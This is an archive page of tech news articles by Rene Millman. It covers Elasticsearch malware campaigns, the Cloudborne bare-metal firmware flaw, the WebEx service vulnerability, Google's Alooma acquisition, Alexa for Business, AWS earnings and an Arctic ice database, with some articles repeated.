All posts by Rene Millman

Hackers target Elasticsearch clusters in fresh malware campaign


Rene Millman

27 Feb, 2019

Security researchers have observed a spike in attacks from multiple threat actors targeting Elasticsearch clusters, in what is believed to be attempts to place malware on victims’ machines.

Attackers appear targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker’s payloads, according to a blog post by researchers at Cisco Talos. Researchers found that both malware and cryptocurrency miners were being left on target machines.

Researchers explained that because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present.

Hackers have been consistently deploying two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget.

“This is likely an attempt to make the exploit work on a broader variety of platforms,” said researchers.

Researchers also saw a second hacker exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. “The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners,” said researchers.

A third hacker was observed to download a file named “LinuxT” from an HTTP file server using exploits targeting CVE-2014-3120. hosts that attempted to download the “LinuxT” sample also dropped payloads that executed the command “echo ‘qq952135763.'”

“This behaviour has been seen in elastic search error logs going back several years,” said researchers.

Honeypots set up by researchers also detected additional hosts exploiting Elasticsearch to drop payloads that execute both “echo ‘qq952135763′” and “echo ‘952135763,’” suggesting that the attacks are related to the same QQ account.

“However, none of the IPs associated with these attacks have been observed attempting to download the “LinuxT” payload linked to this attacker. Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one,” said researchers.

Researchers said that these Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. “Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe,” warned researchers.

Organisations using Elasticsearch are urged to patch and upgrade to a newer version of Elasticsearch if at all possible.

Bare metal flaw allows hackers to put backdoors into cloud servers


Rene Millman

27 Feb, 2019

A new flaw has been discovered by security researchers that could enable hackers to install backdoors on the firmware of bare-metal cloud servers that stay active even when the customer using the hardware has been re-assigned elsewhere.

Called “Cloudbourne”, the vulnerability was first discovered by researchers at the Eclypsium Research Team, who detailed their findings in a blog post. They found that hackers could plant backdoors and malware in the firmware of a server, or in its baseboard management controller (BMC), with relative ease.

These BMCs enable remote management of a server for initial provisioning, operating system reinstall and troubleshooting. Cloudborne exploits a flaw in the hardware’s reclamation process when moving clients on and off a bare metal server.

While physical servers are dedicated to one customer at a time, they don’t stay that way forever,” said researchers. “Servers are provisioned and reclaimed over time and naturally move from customer to customer.”

The firmware of the hardware is not reflashed in the reclamation process, allowing backdoors to persist. A hacker uses a known vulnerability in Supermicro hardware to rewrite the BMC and gain direct access to the hardware.

Researchers said that hackers “could spend a nominal sum of money for access to a server, implant malicious firmware at the UEFI, BMC, or even component level, such as in drives or network adapters. Then the attacker could release the hardware back to the service provider, which could put it back into use with another customer.”

They added that given a BMC’s ability to control the server, any compromises to that firmware can provide access to powerful tools for an attacker to exploit.

“Given the nature of the applications and data hosted on bare-metal offerings, this opens up the possibility for high-impact attack scenarios,” they said.

These scenarios include application disruption, where a malicious implant at the BMC level could permanently disable a server; data theft, as it provides attackers with another very low-level way of stealing or intercepting data; and ransomware attacks, as attackers would naturally have the ability to take hold of valuable assets.

The backdoor could also compromise other parts of cloud infrastructure. For example, hackers could send malicious IPMI commands over system interfaces from the host without the commands being authenticated.

“Since there is no authentication performed when using system interfaces, the only barrier to running arbitrary code within the BMC is whether the BMC itself performs cryptographically secure signature verification of the firmware update image before applying the update. Unfortunately, not all BMCs perform this check, and even when they do, malware can exploit vulnerabilities in the BMC firmware to bypass it,” noted researchers.

Researchers said that as firmware underlies even the host operating system and the virtualization layers of a server, any implants would naturally be able to subvert any controls and security measures running at these higher layers.

Google acquires Alooma to bolster cloud migration efforts


Rene Millman

20 Feb, 2019

Google has announced plans to buy cloud migration company Alooma in a bid to boost its cloud migration capacities.

In a blog post, Amit Ganesh, vice president  of engineering at Google, said that the addition of Alooma, subject to closing conditions, “is a natural fit that allows us to offer customers a streamlined, automated migration experience to Google Cloud, and give them access to our full range of database services, from managed open source database offerings to solutions like Cloud Spanner and Cloud Bigtable”.

“This simplified migration path also opens the door for customers to take advantage of all the technologies we have to offer, including analytics, security, AI and machine learning,” he said.

Alooma was founded in 2013 and specialises in Extract, Transform, Load (ETL) applications. This enables users to pull in data from many sources, including Oracle, Azure, and SaaS providers such as SalesForce and mapping this data to data warehouses such as Redshift and BigQuery.

The deal would bring ETL services to Google Cloud. Amazon and Microsoft have ETL services in the form of Azure Data Factory and AWS Glue.

In a blog post, Yoni Broyde and Yair Weinberger, co-founders of Alooma, said the acquisition is the evolution of their company’s long-standing partnership with Google Cloud.

“It follows several native integrations, over the years, from Google Ads and Analytics to Cloud Spanner and BigQuery,” they said.

“We believe that as part of Google Cloud — bringing together the best-in-class data migration and integration services — we can make our customers and partners even more data-driven and successful.”

The co-founders added that the move would bring the company closer to delivering a full self-service database migration experience bolstered by the power of their cloud technology, including analytics, security, AI, and machine learning.

The terms of the deal were not disclosed nor was a date for when the acquisition will be finalised.

Alexa for Business now open to third-party integration


Rene Millman

26 Oct, 2018

Amazon’s Alexa voice assistant could soon be popping up on office printers and photocopiers.

The firm has announced an extension to its existing Alexa Voice Service Device SDK that would enable third-party manufacturers to add the voice assistant to their business devices.

The SDK would enable devices to sport Alexa and be managed as shared devices in organisations. Alexa for Business customers will soon be able to centrally manage and deploy supported products with Alexa built-in – whether it’s built by Amazon or third-party device makers.

The move would see the deployment of third-party devices to shared spaces such as conference rooms, hotel and dorm rooms, lobbies, kitchens, break rooms, and copy rooms, according to Sanjay Ramaswamy, a developer at Amazon.

The SDK would also enable device management as part of the device makers’ existing management flow, such as room designation, device health monitoring, and location setting. There will also be skill management, such as public and private skill assignment for shared devices without publishing to the public Alexa Skills Store.

In a blog post, Collin Davis, GM, Alexa for Business, said that customers “love using Alexa on Echo devices to simplify meeting room experiences and have asked us to enable the same experiences on their existing equipment”.

“We are excited to be working with device makers to bring the power of Alexa to our customers through the devices they already use around the office. Customers get all the benefits of Alexa for Business without having to install any new hardware,” he said.

Amazon said it was working with devices makers such as  Plantronics, iHome, and BlackBerry, and solution providers like Linkplay and Extron to bring Alexa to workplaces.

The Alexa for Business capabilities is provided as an extension to the AVS Device SDK, starting with version 1.10, available to download from Github. Device manufacturers can learn more about enabling existing Alexa built-in devices with Alexa for Business as shared devices here.

Alexa for Business now open to third-party integration


Rene Millman

26 Oct, 2018

Amazon’s Alexa voice assistant could soon be popping up on office printers and photocopiers.

The firm has announced an extension to its existing Alexa Voice Service Device SDK that would enable third-party manufacturers to add the voice assistant to their business devices.

The SDK would enable devices to sport Alexa and be managed as shared devices in organisations. Alexa for Business customers will soon be able to centrally manage and deploy supported products with Alexa built-in – whether it’s built by Amazon or third-party device makers.

The move would see the deployment of third-party devices to shared spaces such as conference rooms, hotel and dorm rooms, lobbies, kitchens, break rooms, and copy rooms, according to Sanjay Ramaswamy, a developer at Amazon.

The SDK would also enable device management as part of the device makers’ existing management flow, such as room designation, device health monitoring, and location setting. There will also be skill management, such as public and private skill assignment for shared devices without publishing to the public Alexa Skills Store.

In a blog post, Collin Davis, GM, Alexa for Business, said that customers “love using Alexa on Echo devices to simplify meeting room experiences and have asked us to enable the same experiences on their existing equipment”.

“We are excited to be working with device makers to bring the power of Alexa to our customers through the devices they already use around the office. Customers get all the benefits of Alexa for Business without having to install any new hardware,” he said.

Amazon said it was working with devices makers such as  Plantronics, iHome, and BlackBerry, and solution providers like Linkplay and Extron to bring Alexa to workplaces.

The Alexa for Business capabilities is provided as an extension to the AVS Device SDK, starting with version 1.10, available to download from Github. Device manufacturers can learn more about enabling existing Alexa built-in devices with Alexa for Business as shared devices here.

Amazon cloud revenues up by nearly a half in third quarter


Rene Millman

26 Oct, 2018

Amazon’s AWS cloud business increased by 46% year-on-year in its third financial quarter.

It made revenues of $6.68 billion in the quarter, compared with the average estimate of $6.71 billion. AWS also netted over $2 billion in profit.

Net sales for AWS for the last 12 months were $23.3 billion, and operating income for AWS was $2.077 billion, up 77% year-over-year for the third quarter ending 30 September.

In a conference call with media Brian Olsavsky, Amazon’s chief financial officer said that AWS had been able to keep a lid on operating costs over the past quarter due to “better efficiencies” across its network of data centres.

“We’re very happy with the growth in the business,” he said in a conference call to reporters. He added that the efficiencies in AWS’s datacentres benefitted Amazon’s consumer business. Amazon has also been hiring fewer employees and adding less warehouse space.

AWS also saw a 31% operating margin in the third quarter, the highest in four years. But, AWS still only accounted for just 12% of Amazon’s net sales

The company’s cloud arm continues to add features while cutting prices. In Q3 AWS slashed prices of its Lightsail virtual private servers and a new computing instance T3, which the company said boasts a 30% improvement in price to performance over its precursor.

Amazon CEO Jeff Bezos said that its Amazon Business was now posting a $10 billion annual sales run rate.

“Amazon Business is adding customers rapidly, including large educational institutions, local governments, and more than half of the Fortune 100,” he said. “These organisations are choosing Amazon Business because it increases transparency into business spending and streamlines purchasing, with increased control.”

Despite the positive news, Amazon’s shares fell 8% in after-hours trading.

Amazon cloud revenues up by nearly a half in third quarter


Rene Millman

26 Oct, 2018

Amazon’s AWS cloud business increased by 46% year-on-year in its third financial quarter.

It made revenues of $6.68 billion in the quarter, compared with the average estimate of $6.71 billion. AWS also netted over $2 billion in profit.

Net sales for AWS for the last 12 months were $23.3 billion, and operating income for AWS was $2.077 billion, up 77% year-over-year for the third quarter ending 30 September.

In a conference call with media Brian Olsavsky, Amazon’s chief financial officer said that AWS had been able to keep a lid on operating costs over the past quarter due to “better efficiencies” across its network of data centres.

“We’re very happy with the growth in the business,” he said in a conference call to reporters. He added that the efficiencies in AWS’s datacentres benefitted Amazon’s consumer business. Amazon has also been hiring fewer employees and adding less warehouse space.

AWS also saw a 31% operating margin in the third quarter, the highest in four years. But, AWS still only accounted for just 12% of Amazon’s net sales

The company’s cloud arm continues to add features while cutting prices. In Q3 AWS slashed prices of its Lightsail virtual private servers and a new computing instance T3, which the company said boasts a 30% improvement in price to performance over its precursor.

Amazon CEO Jeff Bezos said that its Amazon Business was now posting a $10 billion annual sales run rate.

“Amazon Business is adding customers rapidly, including large educational institutions, local governments, and more than half of the Fortune 100,” he said. “These organisations are choosing Amazon Business because it increases transparency into business spending and streamlines purchasing, with increased control.”

Despite the positive news, Amazon’s shares fell 8% in after-hours trading.

Remote code execution flaw found in Cisco WebEx


Rene Millman

25 Oct, 2018

Security researchers have discovered a flaw in WebEx’s WebexUpdateService that allows anyone with a login to the Windows system where Cisco’s client software is installed to run system-level code remotely.

The vulnerability is “pretty unique” as it is “a remote vulnerability in a client application that doesn’t even listen on a port”, according to a blog post by Ron Bowes and Jeff McJunkin of Counter Hack.

When the WebEx client is installed on a system, a Windows service called WebExService is also installed that can execute commands with system-level privilege.

According to a website detailing the hack, due to poorly handled access control lists (ACLs), any local or domain user can start this service over Windows’ remote service interface, except those running the client on Windows 10 (which requires an admin login).

“As far as we know, a remote attack against a 3rd party Windows service is a novel type of attack. We’re calling the class “thank you for your service”, because we can, and are crossing our fingers that more are out there!” Bowes said.

Bowes said that exploiting the vulnerability is “actually easier than checking for it”.

“The patched version of WebEx still allows remote users to connect to the process and start it,” he explained. “However, if the process detects that it’s being asked to run an executable that is not signed by Webex, the execution will halt.”

In an advisory, Cisco said the vulnerability is due to insufficient validation of user-supplied parameters. “An attacker could exploit this vulnerability by invoking the update service command with a crafted argument,” said the advisory.

Bowes said that WebEx released a patch on 3 October and that users should make sure they’re running this new client version.

“The good news is, the patched version of this service will only run files that are signed by WebEx. The bad news is, there are a lot of those out there (including the vulnerable version of the service!), and the service can still be started remotely,” he said.

The Cisco advisory said that users could determine whether a vulnerable version of Cisco Webex Meetings Desktop App is installed on a Windows machine by launching the Cisco Webex Meetings application and clicking the gear icon in the top right of the application window, then selecting the About… menu entry. A popup window displaying the currently installed version will open.

Remote code execution flaw found in Cisco WebEx


Rene Millman

25 Oct, 2018

Security researchers have discovered a flaw in WebEx’s WebexUpdateService that allows anyone with a login to the Windows system where Cisco’s client software is installed to run system-level code remotely.

The vulnerability is “pretty unique” as it is “a remote vulnerability in a client application that doesn’t even listen on a port”, according to a blog post by Ron Bowes and Jeff McJunkin of Counter Hack.

When the WebEx client is installed on a system, a Windows service called WebExService is also installed that can execute commands with system-level privilege.

According to a website detailing the hack, due to poorly handled access control lists (ACLs), any local or domain user can start this service over Windows’ remote service interface, except those running the client on Windows 10 (which requires an admin login).

“As far as we know, a remote attack against a 3rd party Windows service is a novel type of attack. We’re calling the class “thank you for your service”, because we can, and are crossing our fingers that more are out there!” Bowes said.

Bowes said that exploiting the vulnerability is “actually easier than checking for it”.

“The patched version of WebEx still allows remote users to connect to the process and start it,” he explained. “However, if the process detects that it’s being asked to run an executable that is not signed by Webex, the execution will halt.”

In an advisory, Cisco said the vulnerability is due to insufficient validation of user-supplied parameters. “An attacker could exploit this vulnerability by invoking the update service command with a crafted argument,” said the advisory.

Bowes said that WebEx released a patch on 3 October and that users should make sure they’re running this new client version.

“The good news is, the patched version of this service will only run files that are signed by WebEx. The bad news is, there are a lot of those out there (including the vulnerable version of the service!), and the service can still be started remotely,” he said.

The Cisco advisory said that users could determine whether a vulnerable version of Cisco Webex Meetings Desktop App is installed on a Windows machine by launching the Cisco Webex Meetings application and clicking the gear icon in the top right of the application window, then selecting the About… menu entry. A popup window displaying the currently installed version will open.

University of Texas global database to help scientists explore effects of climate change on North Pole


Rene Millman

22 Oct, 2018

A new database has been created to help track the effects of climate change on the North Pole.

Researchers at the University of Texas at San Antonio have developed the database, called ArcCI (or Arctic CyberInfrastructure) that combines thousands of images that have been taken along the years of the Arctic Ocean.

They said that this database would help scientists and the world see the physical changes occurring in the region including ice loss. It is hoped that the web-based repository would enable researchers to spend more time analysing information rather than just collecting and processing data.

“This is to help scientists spend more time doing the science,” said Professor Alberto Mestas-Nuñez, one of two researchers at the University of Texas at San Antonio working on the on-demand data mining module.

“At the present time there isn’t a place on the internet that provides all these datasets but also an algorithm that allows [extraction of] information,” added Mestas. “Most of the time scientists spend time getting data and preparing it. Typically, it’s about 80% preparing the data and 20% doing the actual science. We want to break that paradigm.”

The system will enable scientists to extract information of various ice properties including submerged ice, ice concentration, melt ponds or ice edge, the boundary between an area of ice and the open sea.

The original idea for the ArcCI database came from Professor Hongjie Xie, the principal investigator of the project at UTSA and a professor in the university’s Department of Geological Sciences. While big data analytics and dashboards have been used in many industries, this has not yet been applied to monitoring ice in the Arctic.

Xie along with Xin Miao at Missouri State University started working on the project five years ago. The project has also been funded by the National Science Foundation to develop this database that uses high-resolution imaging either obtained on-site, via satellites or via airborne monitoring.

Currently, the cloud-based system holds about a terabyte of images but will increase in the future as new images are added. The database will also integrate new algorithms as well as additional datasets as they become available.

The cloud framework and interface are being prototyped by Chaowei Yang at George Mason University, another investigator partnering with UTSA. A beta version of ArcCI will be presented at a meeting of the American Geophysical Union to be held in Washington D.C. in December 2018.